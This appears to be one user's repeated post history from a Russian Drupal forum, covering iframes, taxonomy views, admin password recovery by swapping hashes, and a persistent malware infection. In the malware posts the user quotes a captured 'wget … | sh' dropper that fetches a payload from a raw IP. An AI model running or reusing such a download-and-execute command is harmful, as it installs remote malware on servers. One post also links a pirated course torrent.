если содержимое фрейма с другого домена то и не отобразится
точно не помню, но что бы решить, надо делать что то типа прокси со своего ip через кторый проводить чужой сайт
А почему она одинаковая? Оба сайта установлены нормальным образом но из одного дистрибутива. Значит у всех кто установил из одного дистрибутива будет одинаковая соль.
Я же пишу "если все так как я думаю", ничего не утверждаю, а лишь обращаю внимание сообщества. Что вы сразу в стойку становитесь?
Когда вам это скажут битриксоиды поздно будет
я просто ахриниваю что будет если все так как я думаю, все серверы где ломанули друпал возможно теперь дырявые
Сдесь советы были, мол не обновлялись, сами дураки. Теперь в пору всем друпальщикам собираться и бесплатно всем обновлять, а то скоро с каждого угла будут орать друпал жопа
не только в базу, и не только в своем каталоге, эта какашка помещает себя в /var/tmp
прописывает себя в крон, и еще много чего делает, что я не обнаружил.
Поэтому, чтобы зачистить все гарантировано на 100%, надо начать с переустановки сервера.
Создаете юзера
user addd
pass 123456
пароль 123456 зашифруется, вот ту шифрованую строку переносите в запись админа
после этого пароль админа будет 123456
строка будет типа такой
$S$D.GENBTY2IFdrgMsVfszXDoaEZsufepZmTfPZMf6/rYJO1sWlcKE
таблица users пользователь под номером 1 это админ, что бы резко отшить хацкера меняйте имя админа, оно прямым текстом написано, потом неспешно разбирайтесь с паролем, он зашифрован.
Здесь существуют разночтения, по идее, создаете нового пользователя (если это возможно на этом сайте. Даже если он не будет одобрен не страшно, пароль в базе все равно будет), затем зашифрованый пароль, с этой новой уч. записи, копируете вместо пароля админа
Если это не возможно, пробуете создать пользователя на другом сайте, и оттуда берете зашифрованый пароль, может сработать может нет
Вряд ли что поможет, неделю наблюдаю за этой заразой, что бы не делал, через пару дней скотина все восстанавливает, более того, сделал эксперемент, поставил root владельцем index.php , и разрешение 444, так он зараза владельца сменил! Значит и серверу кердык. Так что чисть не чисть все равно получишь х.
Не стоит психовать, я же спрашиваю, не утверждаю, конечно поверхносные, я же не хостер. Однако это вопрос меня всегда смущал, слегка. А тут представилась возможность выяснить.
В isp 5 говорите есть? Отлично, буду знать.
mpm-itk да, я думал об этом, но давно уже апачем не пользуюсь, может быть. Сервер в группу добавить? Тогда и всех пользователей придется в эту же группу добавить, а значит результата ноль.
Просто где приходилось зайти через ssh было так, наверное хостиги хреновые были.
Вот и я про что, если есть доступ sshd все файлы твои (ну почти все), мне так казалось, и пока еще кажется, если bsyomov не просветит.
Это штуку что по ссылке не встречал на шаредах в которые заходил по sshd
Содержимое iframe не отображается Drupal7
если содержимое фрейма с другого домена то и не отобразится
точно не помню, но что бы решить, надо делать что то типа прокси со своего ip через кторый проводить чужой сайт
Как вывести ноды принадлежащие дочернему термину на странице родительского термина?
Контекстные фильтры
Каталог » Все родительские термины: Родительские термины
Нужна помощь в интеграции 1с с друпал7
если в одном товаре несколько вариаций feeds не поможет
Структура сайта на основе терминов таксономии
"Как вывести все термины таксономии в ноду" https://www.drupal.org/project/taxonomy_menu
"при этом родительские термины должны быть заголовками" тоже модуль есть, название не помню
торрент на обучающий курс http://tt.cccp-rutracker.org/forum/dl.php?t=5003302
и вообще там полно по друпалу
Имя пользователя admin не активировано или заблокировано
Попробовал еще один сайт, столетней давности, но обновленный из этого же дистрибутива - работает
Имя пользователя admin не активировано или заблокировано
А почему она одинаковая? Оба сайта установлены нормальным образом но из одного дистрибутива. Значит у всех кто установил из одного дистрибутива будет одинаковая соль.
Имя пользователя admin не активировано или заблокировано
специально попробовал на двух разных сайтах, работает как часы
вот этот волшебый хэш
$S$DmbdcIckIwVzrzdVlGF27d3sW2VqLTvFPwufAorqQbkRH0viyHVk
в нем зашифровано
343434
Как настроить schema.org metatag для Drupal commerce 2?
в восьмерке же дисплеи не отдельно
Не могу войти в админку
а как можно дважды удалить одну тему?
видимо она и после второго удаления на месте...
Проблемы с получением переводов
Не, нужно создать файл, например info.php содержание
<?php phpinfo() ?>
поместить его в корень сайта и открыть в броузере w w w. my-server.net/info.php
Проблемы с получением переводов
php сокет не работает, не правильно сервер настроен
phpinfo() - работает?
Вредоносный код
Черт, прошло двое суток после зачистки.
index.php
Вредоносный код
Смутно, как? А заодно поясните как сервера ломают через сайты. Всегда было интересно.
Вредоносный код
Аааа ну ладно, молчу....
Куда нам, до профессианалов
Вредоносный код
Я же пишу "если все так как я думаю", ничего не утверждаю, а лишь обращаю внимание сообщества. Что вы сразу в стойку становитесь?
Когда вам это скажут битриксоиды поздно будет
Вредоносный код
Однако вот это
wget -q http://158 . 69 . 133 . 18 :8220/logo4.jpg -O - | sh
я отловил собственноручно, и как вы думаете откуда оно?
Вредоносный код
я просто ахриниваю что будет если все так как я думаю, все серверы где ломанули друпал возможно теперь дырявые
Сдесь советы были, мол не обновлялись, сами дураки. Теперь в пору всем друпальщикам собираться и бесплатно всем обновлять, а то скоро с каждого угла будут орать друпал жопа
Вредоносный код
еще как при делах, погуглите вот это
Вредоносный код
не только в базу, и не только в своем каталоге, эта какашка помещает себя в /var/tmp
прописывает себя в крон, и еще много чего делает, что я не обнаружил.
Поэтому, чтобы зачистить все гарантировано на 100%, надо начать с переустановки сервера.
Угоняют сайт - скрыли адрес для входа - /user
Создаете юзера
user addd
pass 123456
пароль 123456 зашифруется, вот ту шифрованую строку переносите в запись админа
после этого пароль админа будет 123456
строка будет типа такой
$S$D.GENBTY2IFdrgMsVfszXDoaEZsufepZmTfPZMf6/rYJO1sWlcKE
Угоняют сайт - скрыли адрес для входа - /user
таблица users пользователь под номером 1 это админ, что бы резко отшить хацкера меняйте имя админа, оно прямым текстом написано, потом неспешно разбирайтесь с паролем, он зашифрован.
Здесь существуют разночтения, по идее, создаете нового пользователя (если это возможно на этом сайте. Даже если он не будет одобрен не страшно, пароль в базе все равно будет), затем зашифрованый пароль, с этой новой уч. записи, копируете вместо пароля админа
Если это не возможно, пробуете создать пользователя на другом сайте, и оттуда берете зашифрованый пароль, может сработать может нет
Вредоносный код
Вряд ли что поможет, неделю наблюдаю за этой заразой, что бы не делал, через пару дней скотина все восстанавливает, более того, сделал эксперемент, поставил root владельцем index.php , и разрешение 444, так он зараза владельца сменил! Значит и серверу кердык. Так что чисть не чисть все равно получишь х.
Как просканировать чужой сайт на файлы, которые можно взять?
Не стоит психовать, я же спрашиваю, не утверждаю, конечно поверхносные, я же не хостер. Однако это вопрос меня всегда смущал, слегка. А тут представилась возможность выяснить.
В isp 5 говорите есть? Отлично, буду знать.
mpm-itk да, я думал об этом, но давно уже апачем не пользуюсь, может быть. Сервер в группу добавить? Тогда и всех пользователей придется в эту же группу добавить, а значит результата ноль.
Просто где приходилось зайти через ssh было так, наверное хостиги хреновые были.
Как просканировать чужой сайт на файлы, которые можно взять?
Как просканировать чужой сайт на файлы, которые можно взять?
Вот и я про что, если есть доступ sshd все файлы твои (ну почти все), мне так казалось, и пока еще кажется, если bsyomov не просветит.
Это штуку что по ссылке не встречал на шаредах в которые заходил по sshd